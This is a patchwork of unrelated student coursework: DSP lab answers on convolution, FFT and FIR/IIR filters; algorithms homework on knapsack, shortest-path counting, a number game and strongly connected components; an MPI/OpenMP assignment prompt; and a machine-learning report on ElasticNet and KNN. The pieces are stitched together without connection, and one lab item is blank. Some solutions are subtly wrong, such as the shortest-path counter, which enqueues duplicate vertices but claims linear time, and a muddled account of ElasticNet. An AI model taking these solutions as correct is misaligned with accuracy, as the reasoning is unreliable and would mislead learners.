1. To compare the manual convolution with the result from np.convolve(), both were computed and plotted on the same graph. The manual convolution was performed using nested loops to apply the convolution sum directly, while np.convolve() used NumPy's built-in convolution function, which is optimized for performance. In the plot, we differentiate the two methods by using distinct colors and line widths: the manual convolution is shown with a thicker blue line, and the np.convolve() result is depicted with a thinner red line. Both methods yield nearly identical results, which visually overlap on the plot, indicating that the manual approach correctly implements the convolution process.

2.

3. Prominent Frequency Components:
○ The FFT magnitude spectrum clearly shows two primary peaks:
■ One at 5 Hz.
■ The second at 12 Hz.
○ These frequencies correspond exactly to the frequencies f1 = 5 Hz and f2 = 12 Hz that were used to construct the signal in the time domain.
Amplitudes of the Peaks:
○ The peak at 5 Hz has a magnitude of approximately 32. This is consistent with the fact that the cosine term has an amplitude of 1. In the FFT, the magnitude of this peak is scaled by the number of samples N, which results in a larger peak.
○ The peak at 12 Hz has a magnitude of approximately 16. This corresponds to the second cosine term, where the amplitude is 0.5. The FFT shows a peak half as large as the one at 5 Hz, which matches the expected amplitude scaling.
Symmetry of the Spectrum:
○ The full FFT result (first plot) is symmetric around 0 Hz, with peaks appearing at both positive and negative frequencies. This is a direct consequence of the fact that the signal x[n] is real-valued, leading to conjugate symmetry in the frequency domain.
○ The second plot focuses on the positive frequencies, showing only the significant frequency components at 5 Hz and 12 Hz.

4. … The Gaussian pulse x(t) is a smoothly varying signal in the time domain. Its magnitude spectrum, obtained through the Fast Fourier Transform (FFT), reveals several important characteristics about the frequency content of the pulse.
Gaussian Shape in the Frequency Domain:
a. The FFT of a Gaussian pulse results in another Gaussian-shaped magnitude spectrum in the frequency domain. This property arises because the Fourier Transform of a Gaussian function is also a Gaussian. The spectrum is centered at 0 Hz, reflecting that the pulse is a low-frequency signal with most of its energy concentrated around zero frequency.
Dominance of Low-Frequency Components:
b. The bell-shaped spectrum shows that the energy of the Gaussian pulse is primarily concentrated at low frequencies. The amplitude decreases rapidly as we move away from 0 Hz. This indicates that the Gaussian pulse is composed mainly of low-frequency components, which corresponds to its smooth and continuous nature in the time domain.
Width of the Frequency Spectrum:
c. The width of the magnitude spectrum depends on the parameter σ, which controls the width of the Gaussian pulse in the time domain. In this case, with σ = 0.1, the spectrum is relatively wide in the frequency domain. According to the time-frequency uncertainty principle, a narrower pulse in the time domain (small σ) results in a broader frequency spectrum.
d. If σ were larger, the time-domain pulse would be wider, and the corresponding frequency spectrum would be narrower, concentrating more energy near 0 Hz.
Interpretation of Frequency Components:
e.
The central peak around 0 Hz indicates the strong presence of DC (low-frequency) components, while the rapid decay of the spectrum indicates minimal contributions from higher frequencies. This reflects that the Gaussian pulse is smooth and doesn't exhibit rapid changes, which would require higher frequency components.

5. FIR Filter (Finite Impulse Response)
1. Time Domain Behavior:
○ The FIR filter attenuates the high-frequency component at 100 Hz while retaining the 10 Hz component, as seen in the FIR-filtered signal plot.
2. Frequency Domain Behavior:
○ In the frequency domain, the 100 Hz component is clearly attenuated in the FFT of the FIR-filtered signal, while the 10 Hz component is preserved. However, the attenuation at 100 Hz is not complete, and some leakage is visible.
○ The frequency response of the FIR filter shows a gradual roll-off after the 50 Hz cutoff frequency, and as a result, the filter does not entirely remove components near the cutoff, which is a common issue in finite-length FIR filters. This makes the filtering less sharp than with an IIR filter.

IIR Filter (Infinite Impulse Response)
1. Time Domain Behavior:
○ The IIR filter effectively removes the high-frequency 100 Hz component and retains the 10 Hz component with minimal distortion. Compared to the FIR filter, the IIR filter introduces significantly less delay and closely matches the low-frequency content of the original signal.
○ The IIR filter achieves this with fewer coefficients, making it computationally more efficient than the FIR filter. However, recursive IIR filters can introduce phase shifts, although using zero-phase filtering (filtfilt) here minimizes this issue.
2. Frequency Domain Behavior:
○ The FFT of the IIR-filtered signal shows complete suppression of the 100 Hz component, while the 10 Hz component is preserved cleanly, indicating the IIR filter's sharper frequency cutoff.
○ The frequency response of the IIR filter shows a much steeper roll-off after 50 Hz, which results in better attenuation of higher frequencies compared to the FIR filter. The IIR filter performs better in suppressing unwanted frequencies while retaining the desired low-frequency components.

Comparison of FIR and IIR Filters:
1. Attenuation Efficiency:
○ Both the FIR and IIR filters effectively suppress the high-frequency component at 100 Hz, but the IIR filter achieves sharper attenuation, as evidenced by the frequency response and FFT plots.
○ The FIR filter's gradual roll-off leads to some residual presence of the 100 Hz component in the frequency spectrum, whereas the IIR filter eliminates it more effectively.
2. Delay and Phase Distortion:
○ The IIR filter, being recursive, introduces minimal delay while still suppressing the high-frequency content, making it more suitable for real-time applications that require lower latency. Phase distortion can be a concern in IIR filters, but the use of zero-phase filtering (filtfilt) avoids this.
3. Computational Efficiency:
○ The FIR filter requires more coefficients and thus more computational resources to achieve similar performance compared to the IIR filter.
○ The IIR filter is more computationally efficient, as it uses fewer coefficients to achieve a sharper cutoff and better attenuation of high frequencies.
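A compact sketch of the kind of comparison discussed above, assuming a 10 Hz + 100 Hz test signal sampled at 1 kHz, a 50 Hz cutoff, and SciPy's firwin / butter / filtfilt; the exact design parameters in the submitted notebook may differ:

import numpy as np
from scipy import signal

fs = 1000                                    # sampling rate in Hz (assumed)
t = np.arange(0, 1.0, 1 / fs)
x = np.sin(2 * np.pi * 10 * t) + 0.5 * np.sin(2 * np.pi * 100 * t)

# FIR low-pass: 101-tap windowed-sinc design with a 50 Hz cutoff
fir = signal.firwin(101, 50, fs=fs)
x_fir = signal.filtfilt(fir, [1.0], x)       # zero-phase filtering

# IIR low-pass: 4th-order Butterworth with a 50 Hz cutoff
b, a = signal.butter(4, 50, btype="low", fs=fs)
x_iir = signal.filtfilt(b, a, x)             # filtfilt removes the phase distortion

# Compare the residual 100 Hz content of the two outputs via the FFT
f = np.fft.rfftfreq(len(t), 1 / fs)
for name, y in [("FIR", x_fir), ("IIR", x_iir)]:
    mag = np.abs(np.fft.rfft(y))
    print(name, "magnitude near 100 Hz:", mag[np.argmin(np.abs(f - 100))])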
This assignment has in total 55 base points and 10 extra points, and the cap is 55. Bonus questions are indicated using the ⋆ mark. Please specify the following information before submission:
• Your Name: Yufeng Xu
• Your NetID: yx3038

Problem 1: Infinite knapsack [10⋆ + 15 pts]

(a)⋆ Prove that in any optimal solution (n1,…,nm), the total number of copies of the items I2,…,Im included in the knapsack is at most wmax − 1, i.e., n2 + ··· + nm ≤ wmax − 1.

(b) Based on the conclusion of (a), design an algorithm Knapsack(m, W, (w1,v1),…,(wm,vm)) for infinite knapsack with running time O(m · w²max). For convenience, your algorithm only needs to return the maximum value achieved. Describe the basic idea and give the pseudocode. Briefly justify the correctness and analyze the time complexity.
(Hint: According to (a), we know that, in an optimal solution, the total weight of the items I2,…,Im is less than w²max, and hence the item I1 occupies "most" of the space in the knapsack. Try to combine this observation with the O(mW)-time DP algorithm.)

Solution.

(a) We prove the claim by contradiction. Suppose there exists an optimal solution with n2 + ··· + nm ≥ wmax. Denote the weights of these copies as w′1, w′2, …, w′n, where n ≥ wmax and, for each j, ∃ i ∈ {2,…,m} such that w′j = wi (several w′j's may equal the same wi). We want to show that ∃ 1 ≤ l ≤ r ≤ n such that w′l + ··· + w′r is a multiple of w1. Consider the sum of the first k of the w′j's, Sk = w′1 + ··· + w′k, and write Sk ≡ Rk (mod w1), where Rk ∈ {0, 1, …, w1 − 1}.
(i) If ∃ k such that Rk = 0, take l = 1 and r = k; then Sk is a multiple of w1.
(ii) If ∄ k such that Rk = 0, then Rk can only take w1 − 1 possible values. Because n ≥ wmax ≥ w1 > w1 − 1, by the pigeonhole principle ∃ k1 < k2 such that Rk1 = Rk2; take l = k1 + 1 and r = k2, so that w′l + ··· + w′r = Sk2 − Sk1 ≡ 0 (mod w1).
In either case we can replace the copies w′l, …, w′r with t = (w′l + ··· + w′r)/w1 copies of item I1, keeping the total weight unchanged, and the total value becomes larger, which contradicts the assumption that the original solution is optimal. Therefore n2 + ··· + nm ≤ wmax − 1.

(b) We know from (a) that n2 + ··· + nm ≤ wmax − 1, hence the total weight of the items I2,…,Im is at most wmax(wmax − 1) < w²max. Consider the naive infinite-knapsack algorithm. Let DP(i, w) represent the maximum value achievable by choosing from items {i, i + 1, …, m} with total weight at most w. Because we either take another copy of the i-th item or take none of them, DP(i, w) = max{DP(i + 1, w), vi + DP(i, w − wi)}. Since i = 1, 2, …, m and w = 0, 1, …, W, this algorithm has time complexity O(mW). Now, with the conclusion from (a), we can limit the search space of w for items i = 2,…,m to {0, 1, …, w²max}. The global maximum is then max over w ∈ {0, …, min(W, w²max)} of DP(2, w) + ⌊(W − w)/w1⌋ · v1. For items 2,…,m, given any total weight limit w, this DP for the infinite knapsack problem yields the optimal total value of the items chosen. For the whole problem, we learned from (a) that the total weight of items 2,…,m is less than w²max, so we can limit their total weight to w²max and simply take as many copies of item 1 as possible for the weight limit we have not used. By using this method we obtain the correct optimal solution. Because the weight limit for items 2,…,m shrinks from W to w²max, and it takes O(1) time to add the copies of item 1 to each partial solution, the time complexity of the revised algorithm is O(m · w²max). Below is the pseudocode:

def KNAPSACK(m, W, I):  # I is a list of items, each with fields w (weight) and v (value)
    # Put the item with the highest value density first; it plays the role of I1.
    I = sorted(I, key=lambda x: x.v / x.w, reverse=True)
    w_max = max(item.w for item in I)
    cap = w_max * w_max  # weight budget reserved for the items I2, ..., Im
    # DP[idx][w]: best value using items I[idx], ..., I[m-1] with total weight at most w
    DP = [[0] * (cap + 1) for _ in range(m + 1)]  # row m handles the boundary case
    for idx in range(m - 1, 0, -1):
        for w in range(cap + 1):
            if w >= I[idx].w:
                DP[idx][w] = max(I[idx].v + DP[idx][w - I[idx].w], DP[idx + 1][w])
            else:
                DP[idx][w] = DP[idx + 1][w]
    # Fill all remaining capacity with copies of I1, the highest-density item.
    ans = max(DP[1][w] + ((W - w) // I[0].w) * I[0].v for w in range(min(W, cap) + 1))
    return ans
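As a quick sanity check of the pseudocode above, a hypothetical toy instance (assuming the items are simple records with fields w and v, e.g. namedtuples; this example is not part of the original submission):

from collections import namedtuple

Item = namedtuple("Item", "w v")
# Item(4, 9) has the best value density (2.25); Item(3, 5) does not (about 1.67).
items = [Item(4, 9), Item(3, 5)]
print(KNAPSACK(2, 10, items))  # expected 19: one copy of (4, 9) plus two copies of (3, 5)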
Problem 2: Counting shortest paths [15 pts]

Given an undirected graph G = (V,E) and a vertex s ∈ V, we want to know, for every vertex t ∈ V, how many (distinct) shortest paths from s to t there are. This can be viewed as a generalization of the unique shortest-path problem. Design an algorithm Count(G,s) to solve this problem. The algorithm should return a list L that contains a pair (v, δv) for each vertex v of G, where δv is the number of shortest paths from s to v. Describe the basic idea and give the pseudocode. Briefly justify the correctness and analyze the time complexity. Your algorithm should run in O(n + m) time, where n = |V| and m = |E|.
A sample example. Suppose the input graph is G = (V,E) where V = {s,a,b,c,d,e} and E = {(a,b),(b,c),(c,d),(a,d),(s,a),(c,e)}; see the figure below. Then the algorithm Count(G,s) should return L = [(s,1),(a,1),(b,1),(c,2),(d,1),(e,2)].
(Hint: Exploit the BFS tree and extend the idea in the unique shortest-path problem.)

Solution. We solve the problem by BFS. Consider a BFS tree of the graph with s as the root, and perform a level-order traversal. For each node, the number of times it appears on its level equals the number of shortest paths to it. When processing a node, we append a neighbor to the next level's queue if the neighbor is first reached on that next level (or has already been assigned to it); neighbors that were reached on an earlier or the current level are ignored, because reaching them again does not correspond to a shortest path. The pseudocode is as follows:

class Node:
    def __init__(self):
        self.neighbors = []

    def add_neighbor(self, other):
        self.neighbors.append(other)
        other.neighbors.append(self)  # the graph is undirected

def COUNT(G, s):
    (V, E) = G  # V: list of Node; E: list of 2-tuples of Nodes
    for edge in E:
        edge[0].add_neighbor(edge[1])
    cnt = {}        # cnt[u]: number of shortest paths from s to u
    dist = {s: 0}   # BFS level at which each node is first reached
    queue = [s]
    level = 0
    while queue != []:
        nxt = []
        for u in queue:  # each occurrence of u on this level corresponds to one shortest path
            cnt[u] = cnt.get(u, 0) + 1
            for v in u.neighbors:
                if v not in dist:
                    dist[v] = level + 1
                    nxt.append(v)
                elif dist[v] == level + 1:
                    nxt.append(v)  # another shortest path reaches v on the next level
        queue = nxt
        level += 1
    L = [(u, c) for (u, c) in cnt.items()]
    return L

This algorithm is correct because all the nodes that have the same shortest-path length are on the same level of the BFS tree, so by counting the number of times a node appears on the shallowest level where it appears, we count the number of shortest paths to that node. Because only shortest paths are considered, each edge is traversed only along shortest paths; the sum of the number of times the nodes are visited is O(m), therefore this algorithm runs in O(m) (and consequently O(m + n)) time.

Problem 3: Reaching the one [15 pts]

Let n ≥ 3 be a given positive integer and we are going to play a game as follows. During the game, we have a number k which is initially equal to 2. In each round of the game, we are allowed to change the current number k to a new number in one of the following ways:
• Type-A: Change k to (k + 1) mod n.
• Type-B: Change k to a divisor of k that is greater than 1.
• Type-C: Change k to k² mod n.
Note that the above three rules guarantee that our number k is always in the range {0,1,…,n−1} during the entire game. The game terminates when k becomes 1. Our goal is to finish the game in the fewest rounds.
For example, suppose n = 91. We can play the game as follows.
• Round 1: 2 =⇒ 3 using a Type-A change.
• Round 2: 3 =⇒ 9 using a Type-C change.
• Round 3: 9 =⇒ 81 using a Type-C change.
• Round 4: 81 =⇒ 27 using a Type-B change.
• Round 5: 27 =⇒ 1 using a Type-C change.
As you can verify, this is an optimal solution. Design an algorithm Game(n) which returns an optimal solution to the game as a list. So Game(91) should return [2,3,9,81,27,1] (or another solution with 5 rounds). Describe the basic idea and give the pseudocode. Briefly justify the correctness and analyze the time complexity. Your algorithm should run in O(n log n) time.
(Hint: Formulate the problem as a graph problem with n vertices and O(n log n) edges.)

Solution. We construct a graph based on the problem setting: all the possible remainders modulo n, namely 0, 1, …, n−1, become the n vertices. For the Type-A operation, we connect vertex k to vertex k+1 for k = 0,1,…,n−2, and connect n−1 to 0. For the Type-B operation, we connect vertex k to all of its divisors larger than 1. For the Type-C operation, we connect vertex k to k² mod n for k = 2,…,n−1.
Next, we bound the total number of directed edges. For Type-A, the number of edges is n. For Type-B, the number of edges is at most Σ_{i=2}^{n−1} ⌊n/i⌋ ≤ n · Σ_{i=2}^{n} 1/i; by the integral test, Σ_{i=2}^{n} 1/i ≤ ln n, so the Type-B edge count is O(n log n). For Type-C, the number of edges is at most n − 2. Therefore the total number of directed edges is n + O(n log n) + (n − 2) = O(n log n).
Next, we perform a BFS on this graph G, maintained with a queue. We first append the starting vertex 2 to the queue. Each time, for the first vertex in the queue, if it is 1 we stop the BFS; otherwise we append all of its unvisited neighbors to the end of the queue, and record the current vertex as the previous vertex of each newly visited neighbor. This always finds a shortest path between 2 and 1, because vertices are dequeued in non-decreasing order of distance, so when 1 is reached, the recorded path is guaranteed to be shortest. The time complexity of the BFS is O(n log n) because the total number of edges in the graph is O(n log n) and each edge is visited at most once. The time needed to construct the graph is also O(n log n) because each edge takes O(1) time to construct. Therefore, the overall complexity of the algorithm is O(n log n). The pseudocode is given as follows:

class Vertex:
    def __init__(self, val):
        self.val = val
        self.neighbors = []

    def add_neighbor(self, other):
        self.neighbors.append(other)

def GAME(n):
    V = [Vertex(i) for i in range(n)]
    # Type-A edges: k -> (k + 1) mod n
    for i in range(n - 1):
        V[i].add_neighbor(V[i + 1])
    V[n - 1].add_neighbor(V[0])  # wrap-around edge (n - 1) -> 0
    # Type-B edges: k -> every divisor of k that is greater than 1
    for i in range(2, n):
        for j in range(2 * i, n, i):
            V[j].add_neighbor(V[i])
    # Type-C edges: k -> k^2 mod n (skip self-loops)
    for i in range(2, n):
        if i * i % n != i:
            V[i].add_neighbor(V[i * i % n])
    # BFS from vertex 2, recording each vertex's predecessor on a shortest path
    visited = [0 for _ in range(n)]
    prev = [-1 for _ in range(n)]
    queue = [2]
    visited[2] = 1
    while queue != []:
        head = queue[0]
        queue = queue[1:]
        if head == 1:
            break
        for nb in V[head].neighbors:
            if not visited[nb.val]:
                visited[nb.val] = 1
                prev[nb.val] = head
                queue.append(nb.val)
    # Reconstruct the path 2 -> ... -> 1 by following predecessors backwards
    sol = [1]
    while sol[-1] != -1:
        sol.append(prev[sol[-1]])
    return sol[-2::-1]
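A small self-check (not part of the required solution) that a returned path uses only legal moves and matches the optimal length for the worked example n = 91; it assumes GAME is implemented as in the pseudocode above:

def is_legal_move(k, k_next, n):
    if k_next == (k + 1) % n:                        # Type-A
        return True
    if k != 0 and k_next > 1 and k % k_next == 0:    # Type-B: k_next divides k
        return True
    if k_next == (k * k) % n:                        # Type-C
        return True
    return False

path = GAME(91)  # e.g. [2, 3, 9, 81, 27, 1]
assert path[0] == 2 and path[-1] == 1
assert all(is_legal_move(a, b, 91) for a, b in zip(path, path[1:]))
assert len(path) - 1 == 5  # the worked example above shows 5 rounds is optimal for n = 91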
Problem 4: Finding a strongly connected component [10 pts]

Given a directed graph G = (V,E) and a vertex s ∈ V, we want to compute the strongly connected component of G containing s. Design an algorithm SCC(G,s) which returns the set of vertices of G that lie in the same strongly connected component as s. Describe the basic idea and give the pseudocode. Briefly justify the correctness and analyze the time complexity. Your algorithm should run in O(n + m) time, where n = |V| and m = |E|.
(Hint: By definition, a vertex v is in the same strongly connected component as s iff v is reachable from s and s is reachable from v. We already know how to find the vertices reachable from s using DFS. Can you use a similar idea to compute the vertices from which s is reachable?)

Solution. For each node u, we store all the nodes v with (u,v) ∈ E as its out-neighbors and all the nodes w with (w,u) ∈ E as its in-neighbors. Then we perform a DFS along out-neighbors to obtain all the nodes that s can reach, and a DFS along in-neighbors to obtain all the nodes that can reach s. Finally, we take the intersection of the two results, which gives the set of vertices in the strongly connected component containing s.
This algorithm is correct: a DFS along out-neighbors reaches a node t iff t is reachable from s. The DFS along in-neighbors is equivalent to a DFS after reversing the directions of all edges, so it reaches a node t iff there exists a path of reversed edges from s to t, i.e., a path from t to s in the original graph, i.e., s is reachable from t. By taking the intersection of the two results, a node t is kept iff it is reachable from s and it can reach s, i.e., it is strongly connected to s.
The time complexity to process in-neighbors and out-neighbors is O(m). The time complexity of each DFS is O(n + m). Therefore, the time complexity of the whole algorithm is O(n + m). The pseudocode is as follows:

class Node:
    def __init__(self, val):
        self.val = val
        self.neighbors = [[], []]  # index 0: in-neighbors, index 1: out-neighbors

    def add_neighbor(self, other):
        # add an edge from self to other
        self.neighbors[1].append(other)
        other.neighbors[0].append(self)

def SCC(G, s):
    (V, E) = G
    for (u, v) in E:
        u.add_neighbor(v)
    # res[0]: all the nodes that can reach s (found by following in-neighbors)
    # res[1]: all the nodes reachable from s (found by following out-neighbors)
    res = [set(), set()]

    def DFS(u, direction=0):  # direction = 0 follows in-neighbors, 1 follows out-neighbors
        res[direction].add(u)
        for v in u.neighbors[direction]:
            if v not in res[direction]:
                DFS(v, direction=direction)

    DFS(s, 0)
    DFS(s, 1)
    ans = res[0].intersection(res[1])  # s itself belongs to its own component and stays in the set
    return ans
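One implementation note on the recursive DFS above (an aside, not part of the graded solution): for large graphs, CPython's default recursion limit (roughly 1000 frames) can be exceeded on long paths; the same traversal can be done with an explicit stack. A sketch:

def DFS_iterative(start, direction, res):
    # Same traversal as the recursive DFS above, but using an explicit stack.
    # Call as DFS_iterative(s, 0, res) and DFS_iterative(s, 1, res).
    stack = [start]
    res[direction].add(start)
    while stack:
        u = stack.pop()
        for v in u.neighbors[direction]:
            if v not in res[direction]:
                res[direction].add(v)
                stack.append(v)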
CSC718 Operating Sys & Parallel Programming
Homework 4 — MPI, OpenMP, and GPU Programming Assignments
Total: 100 points

The homework assignment will be graded based on the following criteria:
• Accuracy: 1) the solution meets the specific requirements in the problem description; 2) the solution produces correct results; 3) the procedures adopted in the solution are technically sound.
• Efficiency: efficiency will be one of the criteria when grading programming assignments. The solution should produce the desired results efficiently.
• Effort/neatness: the solution shows excellent effort, and all related work is shown neatly and organized well.

Homework assignment feedback will be available through the DropBox folder on D2L. For all the programming assignments, you can choose any operating system you want. I will usually provide C/C++ samples for the programming assignments. If you prefer to use other languages, e.g., Java, they are accepted too. A README.txt is required for any programming assignment submission. In the README.txt, you need to provide the following information:
1) How to compile your program?
2) How to run your program?
3) What is the average running time of your program?
4) What are the expected output results when I run your program?
Zip all your source code, project files, supporting files, and README.txt, and submit the all-in-one zip file to the D2L Dropbox. If you have any questions about the homework, please let me know.

(10 points) What are the strengths and limitations of GPU programming?

(15 points) Among the four parallel frameworks we discussed in class — multithreaded programming, MPI programming, OpenMP programming, and GPU programming (e.g., CUDA) — what strategies would you use, in general, when selecting a parallel framework for your applications?

(10 points) Benchmarking of a sequential program reveals that 95 percent of the execution time is spent inside functions that are amenable to parallelization. What is the maximum speedup we could expect from executing a parallel version of this program on 10 processors, using Amdahl's Law?

The "acceptable" identifier must meet the following constraints:
• The identifier is a six-digit combination of the numerals 0-9.
1. (15 points) Write a sequential program to count the different identifiers given these constraints.
2. (20 points) Convert the sequential program to an MPI parallel program.
3. (20 points) (choose only one: A or B, not both)
   A. Convert the sequential program to an OpenMP parallel program.
   B. Convert the sequential program to a GPU program using a parallel framework of your choice (e.g., CUDA, OpenCL, etc.)
4. (10 points) Benchmark the three programs based on your choice in 3).

Problem                        1 process / 1 thread   2 processes / 2 threads   3 processes / 3 threads   4 processes / 4 threads
Program1.c (sequential)                                n/a                       n/a                       n/a
Program2.c (MPI)
Program3.c (OpenMP or CUDA)
CS771A Assignment 3 — The Boys
Rajarshi Dutta 200762, Udvas Basak 201056, Shivam Pandey 200938

1 Question 1

The first part of the solution uses a linear model, Elastic Net regression, which takes into account both the ridge regression penalty (L2 loss) and the lasso regression penalty (L1 loss). The objective/loss function of the model is

w′ = argmin_w [ ‖y − Xw‖² + α ( λ1 ‖w‖² + λ2 ‖w‖1 ) ]    (1)

where,
• w′ = the weights attached to each of the features of the dataset used to construct the regression model.
• α = a constant that multiplies both the lasso and ridge penalties.
• λ1 = the regularization parameter for the ridge regression penalty.
• λ2 = the regularization parameter for the lasso regression penalty.

During regularization, the lasso portion of the penalty leads to the formation of a sparse model, whereas the quadratic (ridge) portion makes the regularization path more stable, decreases the number of variables to be selected, and promotes a grouping effect. The grouping effect lets correlated variables be identified together, which enhances the sampling procedure. This method first finds the ridge regression coefficients and then, as a second step, applies a lasso-style shrinkage to those coefficients.

In order to determine the best-performing linear model, randomized-search cross-validation has been applied for efficient hyperparameter selection over the following sets of model hyperparameters. Here grid is a dictionary whose keys are the hyperparameters of the Elastic Net regression model and whose values are the candidate settings.

grid = dict()
grid['alpha'] = [1e-5, 1e-4, 1e-3, 1e-2, 1e-1, 0.0, 0.2, 1.0]
grid['l1_ratio'] = np.arange(0, 1, 0.01)
grid['selection'] = ['cyclic', 'random']
grid['max_iter'] = [2, 10, 100, 1000]
grid['tol'] = [1e-4, 1e-3, 1e-5, 1e-2, 1e-1, 0.0]

The randomized-search cross-validation returns the best estimator with the following hyperparameters:

ElasticNet(alpha=0.1, l1_ratio=0.62, selection='random', tol=0.001, warm_start=True)

The corresponding MAE scores on the training data are 5.6248 (for the O3 levels) and 6.5136 (for the NO2 levels), respectively.
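For reference, a minimal sketch of the randomized search described above, assuming scikit-learn's ElasticNet and RandomizedSearchCV with one model per target; the data arrays and settings such as n_iter and cv below are illustrative placeholders, not necessarily the values used in the actual submission:

import numpy as np
from sklearn.linear_model import ElasticNet
from sklearn.model_selection import RandomizedSearchCV

grid = {
    'alpha': [1e-5, 1e-4, 1e-3, 1e-2, 1e-1, 0.0, 0.2, 1.0],
    'l1_ratio': np.arange(0, 1, 0.01),
    'selection': ['cyclic', 'random'],
    'max_iter': [2, 10, 100, 1000],
    'tol': [1e-4, 1e-3, 1e-5, 1e-2, 1e-1, 0.0],
}

rng = np.random.default_rng(0)
X_train = rng.normal(size=(200, 5))   # placeholder features; the real ones come from the dataset
y_train_o3 = rng.normal(size=200)     # placeholder O3 targets; repeat the search for NO2

search = RandomizedSearchCV(
    ElasticNet(warm_start=True),
    param_distributions=grid,
    n_iter=100,                            # number of sampled configurations (assumed)
    scoring='neg_mean_absolute_error',     # matches the MAE metric reported above
    cv=5,
    random_state=0,
)
search.fit(X_train, y_train_o3)
print(search.best_estimator_, -search.best_score_)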
2 Question 2

A suitable non-linear model which can effectively fit the given dataset is the K-Nearest-Neighbours (KNN) algorithm. KNN can be used both as a classification and as a regression model; it predicts for an unknown data point based on its distance to the k nearest training points. The model can work with several distance metrics, most commonly the Euclidean, Minkowski and Manhattan distances. One strength of the KNN regression algorithm that we would like to highlight is its ability to work well with non-linear relationships. For regression tasks, the algorithm selects the k nearest points under the chosen distance metric and predicts the value of the new point as approximately the average of those neighbours' values. In the distance-weighted k-nearest-neighbour rule, the weight given to a neighbour varies with the distance between the sample and that neighbour, decreasing as the sample-to-neighbour distance increases. (2)

Here, the optimal value of k has been determined by plotting the train MAE loss and the test MAE loss for both the O3 and the NO2 sensor values. The MAE loss variation for different k values is shown below.

[Figure 1: MAE loss variation for K values]

We find that the KNN regressor provides the minimum mean absolute error for a k value of 5.

model = KNeighborsRegressor(n_neighbors=5, p=1, algorithm="auto", n_jobs=-1)

Some other models tested for the given regression problem include XGBoost, multi-layer perceptron and random forest regressor models.
• XGBoost Regressor: XGBoost uses a combination of two techniques, gradient boosting and tree boosting, to improve the accuracy of the model. Gradient boosting minimizes the loss function (mean absolute error) by iteratively adding weak learners (e.g., decision trees) to the model. Tree boosting, on the other hand, optimizes the split points of the decision trees by minimizing the loss function.
• Random Forest Regressor: The algorithm works by creating a large number of decision trees, each of which is trained on a subset of the data and a subset of the features. The final prediction is then made by averaging the predictions of all the trees in the forest. Random forest regression also includes several regularization techniques to prevent overfitting and improve the generalization of the model, such as maximum depth, minimum samples per leaf, and maximum features.
• Artificial Neural Network: The network consists of three hidden layers with 64, 32 and 8 units. The optimizer used is Adam, the kernel initialisation is He uniform, and the loss function used is the mean absolute error. The network is trained via backpropagation for around 100 epochs on the training data with a batch size of 64.

Non-linear model              O3 MAE loss    NO2 MAE loss
K Neighbours Regressor        3.3284         2.3228
XGBoost Regressor             5.1433         4.7230
Random Forest Regressor       6.0784         5.3145
MultiLayer Perceptron         4.8807         4.9178
Table 1: Stats of different non-linear models

3 Question 3

The code is available in the submit.py file. A code snippet is given below:

import numpy as np
import pickle as pkl

# Define your prediction method here
# df is a dataframe containing timestamps, weather data and potentials
def my_predict(df):
    X = np.array(df.iloc[:, 1:])
    # Load your model file
    model = pkl.load(open("knn_model.pkl", "rb"))
    test_preds = np.transpose(model.predict(X))
    # Make two sets of predictions, one for O3 and another for NO2
    pred_o3, pred_no2 = test_preds[0], test_preds[1]
    # Return both sets of predictions
    return (pred_o3, pred_no2)
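For completeness, a sketch of how the pickled model loaded by my_predict above could be produced, assuming scikit-learn's KNeighborsRegressor with the hyperparameters reported in Question 2; the training arrays here are placeholders, since the real features and O3/NO2 targets come from the provided dataset:

import numpy as np
import pickle as pkl
from sklearn.neighbors import KNeighborsRegressor

rng = np.random.default_rng(0)
X_train = rng.normal(size=(500, 5))     # placeholder features
y_train = rng.normal(size=(500, 2))     # placeholder targets: column 0 = O3, column 1 = NO2

model = KNeighborsRegressor(n_neighbors=5, p=1, algorithm="auto", n_jobs=-1)
model.fit(X_train, y_train)             # KNeighborsRegressor fits the two targets jointly

with open("knn_model.pkl", "wb") as f:
    pkl.dump(model, f)                  # this is the file that my_predict reloads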